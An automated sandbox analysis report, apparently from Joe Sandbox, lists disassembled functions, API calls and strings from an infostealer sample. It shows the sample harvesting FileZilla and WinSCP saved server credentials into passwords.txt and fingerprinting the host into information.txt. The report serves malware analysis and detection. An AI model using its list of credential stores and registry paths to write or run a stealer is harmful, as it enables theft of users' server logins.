                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • strtok_s.MSVCRT ref: 0040BCCB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00425C43,00425C42,00425C3F,00425C3E), ref: 0040BD1F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 0040C06C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                    • API String ID: 486015307-935134978
                                                                                    • Opcode ID: 485589696674899ee60d382fb0c3e7a903a8895ba891ae23780a1d8ef705ae23
                                                                                    • Instruction ID: 75576aa526d99454559884b64ef79bc970659b381021a5103b73b201e8ee831e
                                                                                    • Opcode Fuzzy Hash: 485589696674899ee60d382fb0c3e7a903a8895ba891ae23780a1d8ef705ae23
                                                                                    • Instruction Fuzzy Hash: 3AE16C71900258EADB15EBE1DC56FEEBB78AF19304F50047AF505B21D2EF781A08CB69
                                                                                    Function 0040E7B8 Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                                    • memset.MSVCRT ref: 0040E7E6
                                                                                    • memset.MSVCRT ref: 0040E806
                                                                                    • memset.MSVCRT ref: 0040E81A
                                                                                    • memset.MSVCRT ref: 0040E82E
                                                                                    • memset.MSVCRT ref: 0040E83D
                                                                                    • memset.MSVCRT ref: 0040E84B
                                                                                    • memset.MSVCRT ref: 0040E85C
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C37), ref: 0040E9A2
                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$Value$Open$EnumH_prolog
                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                    • API String ID: 784052110-2798830873
                                                                                    • Opcode ID: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                                    • Instruction ID: d618dc23c2e72a82e05694064c6b478e31e9db7f730d5c61c806b48b50ccc5c5
                                                                                    • Opcode Fuzzy Hash: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                                    • Instruction Fuzzy Hash: DBF11CB1D0025DAEDB11EBE1CC81FEEBB7CAF18304F5441BAE515B2182DB785A48CB65
                                                                                    Function 00414604 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004stringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 877 414604-4153f5 _EH_prolog call 40f923 call 40fa9c call 40f9e1 call 40f98e call 4020ed call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410415 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104a2 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104dd call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e GetCurrentProcessId call 411001 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41064b call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41077c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410925 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbfd call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbcb call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4103a0 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fce5 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc92 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe18 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40feb4 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ff81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ffea call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4102c3 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d call 40f923 call 4010b1 call 414437 call 40f98e * 2 call 401061
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00414609
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004264F6), ref: 0040FC46
                                                                                      • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC4D
                                                                                      • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC59
                                                                                      • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                                      • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                                      • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                                      • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                      • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004265A8,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042659C,00000000), ref: 00414922
                                                                                      • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                      • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                      • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                      • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                      • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                      • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                                      • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                      • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                      • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                                      • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                      • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                                      • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                                      • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                      • Part of subcall function 00410925: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                                      • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                      • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000), ref: 0040FC09
                                                                                      • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                                      • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                      • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                      • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?), ref: 004103E2
                                                                                      • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?,00000000), ref: 004103E9
                                                                                      • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                                      • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                                      • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                      • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                      • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                      • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                      • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                      • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                                      • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                                      • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                                      • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                      • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                      • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                                      • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                                      • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                                      • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                                      • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                                      • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                      • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                      • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                                      • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                                      • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                                      • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                      • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                      • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                      • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                      • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                                      • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                      • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                      • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,004266F0,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004266E0), ref: 0041537A
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                    • API String ID: 722754166-3257470747
                                                                                    • Opcode ID: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                                    • Instruction ID: 34389346271f1e4f7fe34ee782a08fd334c824368f8c7b7c5cb1de368f42fff1
                                                                                    • Opcode Fuzzy Hash: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                                    • Instruction Fuzzy Hash: 7C921EB190424DE9CB15E7E1C952BEEBB789F24308F5041BEE505725C2DE782B8CCAB5
                                                                                    Function 0040C27B Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C280
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
